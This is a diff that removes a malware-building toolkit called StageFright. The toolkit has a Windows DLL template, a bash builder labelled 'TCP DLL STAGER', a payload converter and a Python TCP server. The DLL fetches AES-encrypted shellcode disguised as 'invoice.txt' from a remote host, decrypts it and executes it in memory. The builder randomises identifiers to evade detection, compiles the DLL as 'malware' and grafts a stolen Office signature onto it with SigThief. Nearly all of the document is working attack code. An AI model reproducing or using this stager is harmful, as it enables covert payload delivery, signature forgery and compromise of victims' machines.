-    const char* OQmbgsGuW = "192.168.1.12";        // Replace with the actual server IP
-    int yprPDCUUPq = 8080;                     // Replace with the actual server port
-    const char* Random4 = "invoice.txt";   // Replace with the actual file path on the server
-
-    char* GugJH;
-    size_t ENUQBQQ;
-
-    if (WXEjtHeXGRaH(OQmbgsGuW, yprPDCUUPq, Random4, GugJH, ENUQBQQ)) {
-        printf("Binary data received successfully.\n");
-
-        // Print received data size for debugging
-        printf("Received data size: %zu\n", ENUQBQQ);
-
-        kaRyEcluPiEW((char*)GugJH, ENUQBQQ, iNjzxZyJyK, sizeof(iNjzxZyJyK));
-
-        // Allocate executable memory with READ, WRITE permissions
-        LPVOID executableMemory = VirtualAlloc(NULL, ENUQBQQ, MEM_COMMIT, PAGE_READWRITE);
-        if (executableMemory == NULL) {
-            DWORD error = GetLastError();
-            printf("Error allocating executable memory: %d\n", error);
-            delete[] GugJH;
-            return;
-        }
-
-        // Copy binary data to the executable memory
-        memcpy(executableMemory, GugJH, ENUQBQQ);
-
-        // Change the protection to PAGE_EXECUTE_READ
-        DWORD oldProtect;
-        if (!VirtualProtect(executableMemory, ENUQBQQ, PAGE_EXECUTE_READ, &oldProtect)) {
-            DWORD error = GetLastError();
-            printf("Error changing memory protection: %d\n", error);
-            VirtualFree(executableMemory, 0, MEM_RELEASE);
-            delete[] GugJH;
-            return;
-        }
-
-        // Create a function pointer to the shellcode
-        HUUTjodrPVG pCyhiFoGQ = reinterpret_cast<HUUTjodrPVG>(executableMemory);
-
-        // Call the shellcode function
-        printf("Executing shellcode...\n");
-        pCyhiFoGQ();
-
-        // No freeing of allocated memory in this POC
-
-        printf("Shellcode executed successfully.\n");
-
-        // Free allocated memory
-        delete[] GugJH;
-    } else {
-        printf("Failed to receive binary data.\n");
-        return;
-    }
-}
-
-

+ 0 - 175
StageFright/StageFright/StageFright/TCPDLL/TCPDLL.sh

@@ -1,175 +0,0 @@
-#!/bin/bash
-
-# Color variables
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-cat << "EOF"
-TCP DLL STAGER                        
-
-EOF
-
-echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
-echo ""
-read Shellcode
-echo ""
-echo -e ${green}"What's The IP For Your TCP Server?"${clear}
-echo ""
-read HOSTIP
-echo ""
-echo -e ${green}"What Is The Port Your TCP Server Is Using?"${clear}
-echo ""
-read PORTY
-echo ""
-echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
-echo ""
-read SHELLCODEFILE
-echo ""
-echo -e ${green}"Name Your Entry Point Function"${clear}
-echo ""
-read ENTRYPOINT
-echo ""
-echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
-echo ""
-read MALWARE
-echo ""
-cp StageFright/TCPDLL/template.cpp StageFright/TCPDLL/Resources/template.cpp
-echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
-echo ""
-sleep 2
-python3 StageFright/TCPDLL/Resources/aesencrypt.py $Shellcode > shell.txt
-echo -e ${yellow}"***Encryption Completed***"${clear}
-echo ""
-cp shell.txt shell2.txt
-
-#Generate AES Key
-keys=$(cat "shell2.txt")
-cut -d 'p' -f1 shell2.txt > shell3.txt
-keys=$(cat shell3.txt)
-keysnow=${keys#*=}
-sed -i "s/KEYVALUE/$keysnow/g" StageFright/TCPDLL/Resources/template.cpp
-
-#Generate AES Payload
-payload=$(cat "shell.txt")
-payloadnow=${payload#*;}
-payloadtoday=${payloadnow#*=}
-echo $payloadtoday > shell5.txt
-cp StageFright/TCPDLL/conv.py StageFright/TCPDLL/Resources/con.py
-perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/TCPDLL/Resources/con.py
-sed -i "s/{/[/g" -i StageFright/TCPDLL/Resources/con.py
-sed -i "s/}/]/g" -i StageFright/TCPDLL/Resources/con.py
-sed -i "s/;//g" -i StageFright/TCPDLL/Resources/con.py
-python3 StageFright/TCPDLL/Resources/con.py
-#rm StageFright/TCPDLL/Resources/con.py
-mv payload.bin $SHELLCODEFILE
-sleep 2
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomE=$(cat shell.txt)
-sed -i "s/RandomE/$RandomE/g" StageFright/TCPDLL/Resources/template.cpp
-
-
-#Replace IP, PORT and SHELLCODEFILE
-sed -i "s/ENTRYPOINT/$ENTRYPOINT/g" StageFright/TCPDLL/Resources/template.cpp
-sed -i "s/HOSTIP/$HOSTIP/g" StageFright/TCPDLL/Resources/template.cpp
-sed -i "s/PORTY/$PORTY/g" StageFright/TCPDLL/Resources/template.cpp
-sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/TCPDLL/Resources/template.cpp
-#Replacing Values
-
-# Get Payload From URL Function
-
-#FindShare
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random1=$(cat shell.txt)
-sed -i "s/Random1/$Random1/g" StageFright/TCPDLL/Resources/template.cpp
-
-#pPayloadBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-Random2=$(cat shell.txt)
-sed -i "s/Random2/$Random2/g" StageFright/TCPDLL/Resources/template.cpp
-
-#sPayloadSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random3=$(cat shell.txt)
-sed -i "s/Random3/$Random3/g" StageFright/TCPDLL/Resources/template.cpp
-
-#sPayloadSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random4=$(cat shell.txt)
-
-sed -i "s/Random3/$Random3/g" StageFright/TCPDLL/Resources/template.cpp
-#bSTATE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
-Random5=$(cat shell.txt)
-sed -i "s/Random5/$Random5/g" StageFright/TCPDLL/Resources/template.cpp
-
-#sSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
-Random6=$(cat shell.txt)
-sed -i "s/Random6/$Random6/g" StageFright/TCPDLL/Resources/template.cpp
-
-#hInternet
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random7=$(cat shell.txt)
-sed -i "s/Random7/$Random7/g" StageFright/TCPDLL/Resources/template.cpp
-
-#dwBytesRead
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
-Random8=$(cat shell.txt)
-sed -i "s/Random8/$Random8/g" StageFright/TCPDLL/Resources/template.cpp
-
-#pBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random9=$(cat shell.txt)
-sed -i "s/Random9/$Random9/g" StageFright/TCPDLL/Resources/template.cpp
-
-#PAYLOAD
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomA=$(cat shell.txt)
-sed -i "s/RandomA/$RandomA/g" StageFright/TCPDLL/Resources/template.cpp
-
-#Sleep Function
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomJ=$(cat shell.txt)
-sed -i "s/RandomJ/$RandomJ/g" StageFright/TCPDLL/Resources/template.cpp
-
-#AES KEY NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-RandomK=$(cat shell.txt)
-sed -i "s/RandomK/$RandomK/g" StageFright/TCPDLL/Resources/template.cpp
-
-# Main Function
-
-#Bytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomB=$(cat shell.txt)
-sed -i "s/RandomB/$RandomB/g" StageFright/TCPDLL/Resources/template.cpp
-
-#Size
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomC=$(cat shell.txt)
-sed -i "s/RandomC/$RandomC/g" StageFright/TCPDLL/Resources/template.cpp
-
-#Compile
-
-echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -shared -o $MALWARE StageFright/TCPDLL/Resources/template.cpp -lws2_32 -lntdll -static-libgcc -static-libstdc++ -Wl,--subsystem,windows -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
-echo ""
-sleep 2
-rm shell*
-echo -e ${yellow}"***Malware Compiled***"${clear}
-echo ""
-sleep 2
-echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
-echo ""
-sleep 2
-python3 python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
-mv signed$MALWARE $MALWARE
-echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
-echo ""

+ 0 - 4
StageFright/StageFright/StageFright/TCPDLL/conv.py

@@ -1,4 +0,0 @@
-buf=PAYVAL 
-payload = bytes(bytearray(buf))
-with open('payload.bin', 'wb') as f:
-    f.write(payload)

+ 0 - 188
StageFright/StageFright/StageFright/TCPDLL/template.cpp

@@ -1,188 +0,0 @@
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#include <windows.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#pragma comment(lib, "crypt32.lib")
-#pragma comment(lib, "advapi32")
-#include <psapi.h>
-
-// Define the shellcode function signature
-typedef void (*RandomA)();
-
-bool Random1(const char* Random2, int Random3, const char* Random4, char*& Random5, size_t& Random6) {
-    WSADATA wsaData;
-    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
-        printf("Failed to initialize Winsock.\n");
-        return false;
-    }
-
-    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
-    if (clientSocket == INVALID_SOCKET) {
-        perror("Error creating socket");
-        WSACleanup();
-        return false;
-    }
-
-    sockaddr_in serverAddress{};
-    serverAddress.sin_family = AF_INET;
-    serverAddress.sin_port = htons(Random3);
-    serverAddress.sin_addr.s_addr = inet_addr(Random2);
-
-    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
-        perror("Invalid address/Address not supported");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
-        perror("Connection failed");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    // Send the length of the file path first
-    size_t Random4Len = strlen(Random4);
-    printf("Sending file path length: %zu\n", Random4Len);
-    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
-
-    // Send the file path to the server
-    printf("Sending file path: %s\n", Random4);
-    send(clientSocket, Random4, Random4Len, 0);
-
-    int fileSize;
-    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
-    if (bytesRead != sizeof(fileSize)) {
-        printf("Error receiving file size: %d\n", WSAGetLastError());
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
-
-    printf("Received file size: %d\n", fileSize);
-    // Receive and save the binary data in a dynamically allocated buffer
-    Random5 = new char[fileSize];
-    if (Random5 == nullptr) {
-        printf("Error allocating memory for binary data.\n");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    size_t totalSize = 0;
-    while (totalSize < fileSize) {
-        bytesRead = recv(clientSocket, Random5 + totalSize, fileSize - totalSize, 0);
-        if (bytesRead <= 0) {
-            printf("Error receiving binary data: %d\n", WSAGetLastError());
-            delete[] Random5;
-            closesocket(clientSocket);
-            WSACleanup();
-            return false;
-        }
-        totalSize += bytesRead;
-    }
-
-    // Close the socket
-    closesocket(clientSocket);
-
-    Random6 = totalSize;
-    printf("Received data size: %zu\n", Random6);
-
-    return true;
-}
-
-int Random7(char* Random8, unsigned int Random8_len, char* Random9, size_t Random9len) {
-    HCRYPTPROV hProv;
-    HCRYPTHASH hHash;
-    HCRYPTKEY hKey;
-
-    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
-        return -1;
-    }
-    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
-        return -1;
-    }
-    if (!CryptHashData(hHash, (BYTE*)Random9, (DWORD)Random9len, 0)) {
-        return -1;
-    }
-    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
-        return -1;
-    }
-
-    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random8, &Random8_len)) {
-        return -1;
-    }
-
-    CryptReleaseContext(hProv, 0);
-    CryptDestroyHash(hHash);
-    CryptDestroyKey(hKey);
-
-    return 0;
-}
-
-char Random9[] = KEYVALUE;
-
-extern "C" void CALLBACK ENTRYPOINT(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
-    const char* Random2 = "HOSTIP";        // Replace with the actual server IP
-    int Random3 = PORTY;                     // Replace with the actual server port
-    const char* Random4 = "SHELLCODEFILE";   // Replace with the actual file path on the server
-
-    char* Random5;
-    size_t Random6;
-
-    if (Random1(Random2, Random3, Random4, Random5, Random6)) {
-        printf("Binary data received successfully.\n");
-
-        // Print received data size for debugging
-        printf("Received data size: %zu\n", Random6);
-
-        Random7((char*)Random5, Random6, Random9, sizeof(Random9));
-
-        // Allocate executable memory with READ, WRITE permissions
-        LPVOID executableMemory = VirtualAlloc(NULL, Random6, MEM_COMMIT, PAGE_READWRITE);
-        if (executableMemory == NULL) {
-            DWORD error = GetLastError();
-            printf("Error allocating executable memory: %d\n", error);
-            delete[] Random5;
-            return;
-        }
-
-        // Copy binary data to the executable memory
-        memcpy(executableMemory, Random5, Random6);
-
-        // Change the protection to PAGE_EXECUTE_READ
-        DWORD oldProtect;
-        if (!VirtualProtect(executableMemory, Random6, PAGE_EXECUTE_READ, &oldProtect)) {
-            DWORD error = GetLastError();
-            printf("Error changing memory protection: %d\n", error);
-            VirtualFree(executableMemory, 0, MEM_RELEASE);
-            delete[] Random5;
-            return;
-        }
-
-        // Create a function pointer to the shellcode
-        RandomA RandomB = reinterpret_cast<RandomA>(executableMemory);
-
-        // Call the shellcode function
-        printf("Executing shellcode...\n");
-        RandomB();
-
-        // No freeing of allocated memory in this POC
-
-        printf("Shellcode executed successfully.\n");
-
-        // Free allocated memory
-        delete[] Random5;
-    } else {
-        printf("Failed to receive binary data.\n");
-        return;
-    }
-}
-
-

+ 0 - 8
StageFright/StageFright/setup.sh

@@ -1,8 +0,0 @@
-#!/bin/bash
-apt update -y
-cd StageFright/Resources/
-apt-get install mingw-w64 -y
-git clone https://github.com/secretsquirrel/SigThief.git
-mv SigThief/ StageFright/Resources/
-pip install pycryptodome
-

+ 0 - 69
StageFright/StageFright/tcp_server.py

@@ -1,69 +0,0 @@
-import socketserver
-import os
-
-class MyHandler(socketserver.BaseRequestHandler):
-    def handle(self):
-        print("Connection received from:", self.client_address)
-
-        try:
-            # Receive file path length
-            path_len_bytes = self.request.recv(8)
-            if not path_len_bytes:
-                print("Error receiving file path length.")
-                return
-
-            path_len = int.from_bytes(path_len_bytes, byteorder='little')  # Change byte order to 'little'
-            print(f"Received file path length: {path_len}")
-
-            # Receive file path
-            file_path_bytes = b""
-            while len(file_path_bytes) < path_len:
-                received_data = self.request.recv(path_len - len(file_path_bytes))
-                if not received_data:
-                    print("Error receiving file path.")
-                    return
-                file_path_bytes += received_data
-
-            file_name = file_path_bytes.decode('utf-8')
-            print("Received file name:", file_name)
-
-            # Check if the file exists
-            file_path = os.path.join(os.getcwd(), file_name)
-            print("Absolute file path:", file_path)
-            if os.path.exists(file_path):
-                print("File found:", file_path)
-
-                # Read file data
-                with open(file_path, 'rb') as file:
-                    file_data = file.read()
-
-                # Print the size before sending
-                file_size = len(file_data)
-                print("Size of file:", file_size)
-
-                # Send file size to the client
-                self.request.sendall(file_size.to_bytes(4, byteorder='big'))
-
-                # Send file data back to the client
-                self.request.sendall(file_data)
-                print("File data sent successfully.")
-
-            else:
-                print("File not found:", file_path)
-                self.request.sendall(b"FILE_NOT_FOUND")
-
-        except Exception as e:
-            print("Error:", str(e))
-            self.request.sendall(b"SERVER_ERROR")
-
-if __name__ == "__main__":
-    host, port = "192.168.1.12", 8080
-    server = socketserver.TCPServer((host, port), MyHandler)
-    print(f"Server listening on {host}:{port}")
-
-    try:
-        server.serve_forever()
-    except KeyboardInterrupt:
-        print("Server shutting down.")
-        server.shutdown()
-
